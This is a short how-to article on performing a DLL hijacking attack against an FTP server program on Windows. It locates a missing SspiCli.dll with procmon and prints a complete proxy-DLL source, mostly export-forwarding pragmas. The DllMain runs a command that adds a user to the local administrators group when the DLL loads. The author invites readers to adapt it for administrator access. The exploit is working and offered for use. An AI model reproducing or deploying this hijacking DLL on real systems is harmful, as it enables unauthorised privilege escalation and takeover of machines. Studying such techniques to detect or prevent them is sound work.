How to create a DLL Hijacking

By Patrick NeumannGenerally

This article describes how to implement a dll hijacking attack. You need only three tools. Use procmon to identify the vulnerability. Use Spartacus and Visual Studio for preperation.

In ths example I used ftpbasicsvr to prepare a dll for dll hiacking.

Identifiy a vulnerability for dll hijacking

At first you download procmon.

Add following filter.

1: Result contains not found then include
2: Process Name contains ftpbasicsvr (or your program which you want to attack)

Start the program “ftpbasicsvr” and search for any dll which could not found in the program path.

Following dll was not found:

D:\fh-campus\cybersecurity\easyftpsvr-1.7.0.2\SspiCli.dll

Now I have unchecked the first filter item to display other messages.
sspicli.dll was also found in “C:\Windows\SysWOW64\sspicli.dll”

In the next step I created the source project for Microsoft Visual Studio with Spartacus

Following file was created:

#pragma once

#pragma comment(linker,"/export:AcceptSecurityContext=c:\\windows\\syswow64\\sspicli.AcceptSecurityContext,@4")
#pragma comment(linker,"/export:AcquireCredentialsHandleA=c:\\windows\\syswow64\\sspicli.AcquireCredentialsHandleA,@5")
#pragma comment(linker,"/export:AcquireCredentialsHandleW=c:\\windows\\syswow64\\sspicli.AcquireCredentialsHandleW,@6")
#pragma comment(linker,"/export:AddCredentialsA=c:\\windows\\syswow64\\sspicli.AddCredentialsA,@7")
#pragma comment(linker,"/export:AddCredentialsW=c:\\windows\\syswow64\\sspicli.AddCredentialsW,@8")
#pragma comment(linker,"/export:AddSecurityPackageA=c:\\windows\\syswow64\\sspicli.AddSecurityPackageA,@9")
#pragma comment(linker,"/export:AddSecurityPackageW=c:\\windows\\syswow64\\sspicli.AddSecurityPackageW,@10")
#pragma comment(linker,"/export:ApplyControlToken=c:\\windows\\syswow64\\sspicli.ApplyControlToken,@11")
#pragma comment(linker,"/export:ChangeAccountPasswordA=c:\\windows\\syswow64\\sspicli.ChangeAccountPasswordA,@12")
#pragma comment(linker,"/export:ChangeAccountPasswordW=c:\\windows\\syswow64\\sspicli.ChangeAccountPasswordW,@13")
#pragma comment(linker,"/export:CompleteAuthToken=c:\\windows\\syswow64\\sspicli.CompleteAuthToken,@14")
#pragma comment(linker,"/export:CredMarshalTargetInfo=c:\\windows\\syswow64\\sspicli.CredMarshalTargetInfo,@15")
#pragma comment(linker,"/export:CredUnmarshalTargetInfo=c:\\windows\\syswow64\\sspicli.CredUnmarshalTargetInfo,@16")
#pragma comment(linker,"/export:DecryptMessage=c:\\windows\\syswow64\\sspicli.DecryptMessage,@17")
#pragma comment(linker,"/export:DeleteSecurityContext=c:\\windows\\syswow64\\sspicli.DeleteSecurityContext,@18")
#pragma comment(linker,"/export:DeleteSecurityPackageA=c:\\windows\\syswow64\\sspicli.DeleteSecurityPackageA,@19")
#pragma comment(linker,"/export:DeleteSecurityPackageW=c:\\windows\\syswow64\\sspicli.DeleteSecurityPackageW,@20")
#pragma comment(linker,"/export:EncryptMessage=c:\\windows\\syswow64\\sspicli.EncryptMessage,@21")
#pragma comment(linker,"/export:EnumerateSecurityPackagesA=c:\\windows\\syswow64\\sspicli.EnumerateSecurityPackagesA,@22")
#pragma comment(linker,"/export:EnumerateSecurityPackagesW=c:\\windows\\syswow64\\sspicli.EnumerateSecurityPackagesW,@23")
#pragma comment(linker,"/export:ExportSecurityContext=c:\\windows\\syswow64\\sspicli.ExportSecurityContext,@24")
#pragma comment(linker,"/export:FreeContextBuffer=c:\\windows\\syswow64\\sspicli.FreeContextBuffer,@25")
#pragma comment(linker,"/export:FreeCredentialsHandle=c:\\windows\\syswow64\\sspicli.FreeCredentialsHandle,@26")
#pragma comment(linker,"/export:GetSecurityUserInfo=c:\\windows\\syswow64\\sspicli.GetSecurityUserInfo,@27")
#pragma comment(linker,"/export:GetUserNameExA=c:\\windows\\syswow64\\sspicli.GetUserNameExA,@28")
#pragma comment(linker,"/export:GetUserNameExW=c:\\windows\\syswow64\\sspicli.GetUserNameExW,@29")
#pragma comment(linker,"/export:ImpersonateSecurityContext=c:\\windows\\syswow64\\sspicli.ImpersonateSecurityContext,@30")
#pragma comment(linker,"/export:ImportSecurityContextA=c:\\windows\\syswow64\\sspicli.ImportSecurityContextA,@31")
#pragma comment(linker,"/export:ImportSecurityContextW=c:\\windows\\syswow64\\sspicli.ImportSecurityContextW,@32")
#pragma comment(linker,"/export:InitSecurityInterfaceA=c:\\windows\\syswow64\\sspicli.InitSecurityInterfaceA,@33")
#pragma comment(linker,"/export:InitSecurityInterfaceW=c:\\windows\\syswow64\\sspicli.InitSecurityInterfaceW,@34")
#pragma comment(linker,"/export:InitializeSecurityContextA=c:\\windows\\syswow64\\sspicli.InitializeSecurityContextA,@35")
#pragma comment(linker,"/export:InitializeSecurityContextW=c:\\windows\\syswow64\\sspicli.InitializeSecurityContextW,@36")
#pragma comment(linker,"/export:LogonUserExExW=c:\\windows\\syswow64\\sspicli.LogonUserExExW,@37")
#pragma comment(linker,"/export:LsaCallAuthenticationPackage=c:\\windows\\syswow64\\sspicli.LsaCallAuthenticationPackage,@38")
#pragma comment(linker,"/export:LsaConnectUntrusted=c:\\windows\\syswow64\\sspicli.LsaConnectUntrusted,@39")
#pragma comment(linker,"/export:LsaDeregisterLogonProcess=c:\\windows\\syswow64\\sspicli.LsaDeregisterLogonProcess,@40")
#pragma comment(linker,"/export:LsaEnumerateLogonSessions=c:\\windows\\syswow64\\sspicli.LsaEnumerateLogonSessions,@41")
#pragma comment(linker,"/export:LsaFreeReturnBuffer=c:\\windows\\syswow64\\sspicli.LsaFreeReturnBuffer,@42")
#pragma comment(linker,"/export:LsaGetLogonSessionData=c:\\windows\\syswow64\\sspicli.LsaGetLogonSessionData,@43")
#pragma comment(linker,"/export:LsaLogonUser=c:\\windows\\syswow64\\sspicli.LsaLogonUser,@44")
#pragma comment(linker,"/export:LsaLookupAuthenticationPackage=c:\\windows\\syswow64\\sspicli.LsaLookupAuthenticationPackage,@45")
#pragma comment(linker,"/export:LsaRegisterLogonProcess=c:\\windows\\syswow64\\sspicli.LsaRegisterLogonProcess,@46")
#pragma comment(linker,"/export:LsaRegisterPolicyChangeNotification=c:\\windows\\syswow64\\sspicli.LsaRegisterPolicyChangeNotification,@47")
#pragma comment(linker,"/export:LsaUnregisterPolicyChangeNotification=c:\\windows\\syswow64\\sspicli.LsaUnregisterPolicyChangeNotification,@48")
#pragma comment(linker,"/export:MakeSignature=c:\\windows\\syswow64\\sspicli.MakeSignature,@49")
#pragma comment(linker,"/export:QueryContextAttributesA=c:\\windows\\syswow64\\sspicli.QueryContextAttributesA,@50")
#pragma comment(linker,"/export:QueryContextAttributesExA=c:\\windows\\syswow64\\sspicli.QueryContextAttributesExA,@51")
#pragma comment(linker,"/export:QueryContextAttributesExW=c:\\windows\\syswow64\\sspicli.QueryContextAttributesExW,@52")
#pragma comment(linker,"/export:QueryContextAttributesW=c:\\windows\\syswow64\\sspicli.QueryContextAttributesW,@53")
#pragma comment(linker,"/export:QueryCredentialsAttributesA=c:\\windows\\syswow64\\sspicli.QueryCredentialsAttributesA,@54")
#pragma comment(linker,"/export:QueryCredentialsAttributesExA=c:\\windows\\syswow64\\sspicli.QueryCredentialsAttributesExA,@55")
#pragma comment(linker,"/export:QueryCredentialsAttributesExW=c:\\windows\\syswow64\\sspicli.QueryCredentialsAttributesExW,@56")
#pragma comment(linker,"/export:QueryCredentialsAttributesW=c:\\windows\\syswow64\\sspicli.QueryCredentialsAttributesW,@57")
#pragma comment(linker,"/export:QuerySecurityContextToken=c:\\windows\\syswow64\\sspicli.QuerySecurityContextToken,@58")
#pragma comment(linker,"/export:QuerySecurityPackageInfoA=c:\\windows\\syswow64\\sspicli.QuerySecurityPackageInfoA,@59")
#pragma comment(linker,"/export:QuerySecurityPackageInfoW=c:\\windows\\syswow64\\sspicli.QuerySecurityPackageInfoW,@60")
#pragma comment(linker,"/export:RevertSecurityContext=c:\\windows\\syswow64\\sspicli.RevertSecurityContext,@61")
#pragma comment(linker,"/export:SaslAcceptSecurityContext=c:\\windows\\syswow64\\sspicli.SaslAcceptSecurityContext,@62")
#pragma comment(linker,"/export:SaslEnumerateProfilesA=c:\\windows\\syswow64\\sspicli.SaslEnumerateProfilesA,@63")
#pragma comment(linker,"/export:SaslEnumerateProfilesW=c:\\windows\\syswow64\\sspicli.SaslEnumerateProfilesW,@64")
#pragma comment(linker,"/export:SaslGetContextOption=c:\\windows\\syswow64\\sspicli.SaslGetContextOption,@65")
#pragma comment(linker,"/export:SaslGetProfilePackageA=c:\\windows\\syswow64\\sspicli.SaslGetProfilePackageA,@66")
#pragma comment(linker,"/export:SaslGetProfilePackageW=c:\\windows\\syswow64\\sspicli.SaslGetProfilePackageW,@67")
#pragma comment(linker,"/export:SaslIdentifyPackageA=c:\\windows\\syswow64\\sspicli.SaslIdentifyPackageA,@68")
#pragma comment(linker,"/export:SaslIdentifyPackageW=c:\\windows\\syswow64\\sspicli.SaslIdentifyPackageW,@69")
#pragma comment(linker,"/export:SaslInitializeSecurityContextA=c:\\windows\\syswow64\\sspicli.SaslInitializeSecurityContextA,@70")
#pragma comment(linker,"/export:SaslInitializeSecurityContextW=c:\\windows\\syswow64\\sspicli.SaslInitializeSecurityContextW,@71")
#pragma comment(linker,"/export:SaslSetContextOption=c:\\windows\\syswow64\\sspicli.SaslSetContextOption,@72")
#pragma comment(linker,"/export:SealMessage=c:\\windows\\syswow64\\sspicli.SealMessage,@73")
#pragma comment(linker,"/export:SecCacheSspiPackages=c:\\windows\\syswow64\\sspicli.SecCacheSspiPackages,@74")
#pragma comment(linker,"/export:SecDeleteUserModeContext=c:\\windows\\syswow64\\sspicli.SecDeleteUserModeContext,@1")
#pragma comment(linker,"/export:SecInitUserModeContext=c:\\windows\\syswow64\\sspicli.SecInitUserModeContext,@2")
#pragma comment(linker,"/export:SeciAllocateAndSetCallFlags=c:\\windows\\syswow64\\sspicli.SeciAllocateAndSetCallFlags,@75")
#pragma comment(linker,"/export:SeciAllocateAndSetCallTarget=c:\\windows\\syswow64\\sspicli.SeciAllocateAndSetCallTarget,@76")
#pragma comment(linker,"/export:SeciAllocateAndSetIPAddress=c:\\windows\\syswow64\\sspicli.SeciAllocateAndSetIPAddress,@77")
#pragma comment(linker,"/export:SeciFreeCallContext=c:\\windows\\syswow64\\sspicli.SeciFreeCallContext,@78")
#pragma comment(linker,"/export:SeciIsProtectedUser=c:\\windows\\syswow64\\sspicli.SeciIsProtectedUser,@79")
#pragma comment(linker,"/export:SetContextAttributesA=c:\\windows\\syswow64\\sspicli.SetContextAttributesA,@80")
#pragma comment(linker,"/export:SetContextAttributesW=c:\\windows\\syswow64\\sspicli.SetContextAttributesW,@81")
#pragma comment(linker,"/export:SetCredentialsAttributesA=c:\\windows\\syswow64\\sspicli.SetCredentialsAttributesA,@82")
#pragma comment(linker,"/export:SetCredentialsAttributesW=c:\\windows\\syswow64\\sspicli.SetCredentialsAttributesW,@83")
#pragma comment(linker,"/export:SspiCompareAuthIdentities=c:\\windows\\syswow64\\sspicli.SspiCompareAuthIdentities,@84")
#pragma comment(linker,"/export:SspiCopyAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiCopyAuthIdentity,@85")
#pragma comment(linker,"/export:SspiDecryptAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiDecryptAuthIdentity,@86")
#pragma comment(linker,"/export:SspiDecryptAuthIdentityEx=c:\\windows\\syswow64\\sspicli.SspiDecryptAuthIdentityEx,@87")
#pragma comment(linker,"/export:SspiEncodeAuthIdentityAsStrings=c:\\windows\\syswow64\\sspicli.SspiEncodeAuthIdentityAsStrings,@88")
#pragma comment(linker,"/export:SspiEncodeStringsAsAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiEncodeStringsAsAuthIdentity,@89")
#pragma comment(linker,"/export:SspiEncryptAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiEncryptAuthIdentity,@90")
#pragma comment(linker,"/export:SspiEncryptAuthIdentityEx=c:\\windows\\syswow64\\sspicli.SspiEncryptAuthIdentityEx,@91")
#pragma comment(linker,"/export:SspiExcludePackage=c:\\windows\\syswow64\\sspicli.SspiExcludePackage,@92")
#pragma comment(linker,"/export:SspiFreeAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiFreeAuthIdentity,@93")
#pragma comment(linker,"/export:SspiGetComputerNameForSPN=c:\\windows\\syswow64\\sspicli.SspiGetComputerNameForSPN,@94")
#pragma comment(linker,"/export:SspiGetTargetHostName=c:\\windows\\syswow64\\sspicli.SspiGetTargetHostName,@95")
#pragma comment(linker,"/export:SspiIsAuthIdentityEncrypted=c:\\windows\\syswow64\\sspicli.SspiIsAuthIdentityEncrypted,@96")
#pragma comment(linker,"/export:SspiLocalFree=c:\\windows\\syswow64\\sspicli.SspiLocalFree,@97")
#pragma comment(linker,"/export:SspiMarshalAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiMarshalAuthIdentity,@98")
#pragma comment(linker,"/export:SspiPrepareForCredRead=c:\\windows\\syswow64\\sspicli.SspiPrepareForCredRead,@99")
#pragma comment(linker,"/export:SspiPrepareForCredWrite=c:\\windows\\syswow64\\sspicli.SspiPrepareForCredWrite,@100")
#pragma comment(linker,"/export:SspiSetChannelBindingFlags=c:\\windows\\syswow64\\sspicli.SspiSetChannelBindingFlags,@101")
#pragma comment(linker,"/export:SspiUnmarshalAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiUnmarshalAuthIdentity,@102")
#pragma comment(linker,"/export:SspiUnmarshalAuthIdentityInternal=c:\\windows\\syswow64\\sspicli.SspiUnmarshalAuthIdentityInternal,@3")
#pragma comment(linker,"/export:SspiValidateAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiValidateAuthIdentity,@103")
#pragma comment(linker,"/export:SspiZeroAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiZeroAuthIdentity,@104")
#pragma comment(linker,"/export:UnsealMessage=c:\\windows\\syswow64\\sspicli.UnsealMessage,@105")
#pragma comment(linker,"/export:VerifySignature=c:\\windows\\syswow64\\sspicli.VerifySignature,@106")

#include <windows.h>
#include "ios"
#include "fstream"



// Remove this line if you aren't proxying any functions.
HMODULE hModule = LoadLibrary(L"c:\\windows\\syswow64\\sspicli.dll");

// Remove this function if you aren't proxying any functions.
VOID DebugToFile(LPCSTR szInput)
{
    std::ofstream log("spartacus-proxy-sspicli.log", std::ios_base::app | std::ios_base::out);
    log << szInput;
    log << "\n";
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
		system("cmd.exe /k net localgroup administrators testuser /add");
		ExitProcess(0);

    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Build the dll with created Visual Studio Project File and place the dll to the same directory of your application.

You can change and adapt your dll with any code to get access to the ftp server as administrator.

Goot look.